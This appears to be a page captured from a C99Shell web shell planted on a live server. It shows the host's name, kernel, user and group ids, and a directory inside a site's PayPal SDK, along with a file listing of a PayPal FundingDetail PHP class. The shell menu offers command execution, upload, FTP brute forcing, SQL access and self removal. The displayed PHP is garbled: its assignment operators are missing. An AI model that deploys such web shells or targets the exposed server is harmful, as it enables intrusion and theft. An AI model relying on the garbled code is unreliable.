!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.65 GB of 117.98 GB (24.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     FundingDetail.php (2.32 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class FundingDetail
 *
 * Additional detail of the funding.
 *
 * @package PayPal\Api
 *
 * @property string clearing_time
 * @property string payment_hold_date
 * @property string payment_debit_date
 * @property string processing_type
 */
class FundingDetail extends PayPalModel
{
    
/**
     * Expected clearing time
     *
     * @param string $clearing_time
     * 
     * @return $this
     */
    
public function setClearingTime($clearing_time)
    {
        
$this->clearing_time $clearing_time;
        return 
$this;
    }

    
/**
     * Expected clearing time
     *
     * @return string
     */
    
public function getClearingTime()
    {
        return 
$this->clearing_time;
    }

    
/**
     * [DEPRECATED] Hold-off duration of the payment. payment_debit_date should be used instead.
     *
     * @param string $payment_hold_date
     * 
     * @return $this
     */
    
public function setPaymentHoldDate($payment_hold_date)
    {
        
$this->payment_hold_date $payment_hold_date;
        return 
$this;
    }

    
/**
     * @deprecated  [DEPRECATED] Hold-off duration of the payment. payment_debit_date should be used instead.
     *
     * @return string
     */
    
public function getPaymentHoldDate()
    {
        return 
$this->payment_hold_date;
    }

    
/**
     * Date when funds will be debited from the payer's account
     *
     * @param string $payment_debit_date
     * 
     * @return $this
     */
    
public function setPaymentDebitDate($payment_debit_date)
    {
        
$this->payment_debit_date $payment_debit_date;
        return 
$this;
    }

    
/**
     * Date when funds will be debited from the payer's account
     *
     * @return string
     */
    
public function getPaymentDebitDate()
    {
        return 
$this->payment_debit_date;
    }

    
/**
     * Processing type of the payment card
     * Valid Values: ["CUP_SECURE", "PINLESS_DEBIT"]
     *
     * @param string $processing_type
     * 
     * @return $this
     */
    
public function setProcessingType($processing_type)
    {
        
$this->processing_type $processing_type;
        return 
$this;
    }

    
/**
     * Processing type of the payment card
     *
     * @return string
     */
    
public function getProcessingType()
    {
        return 
$this->processing_type;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0053 ]--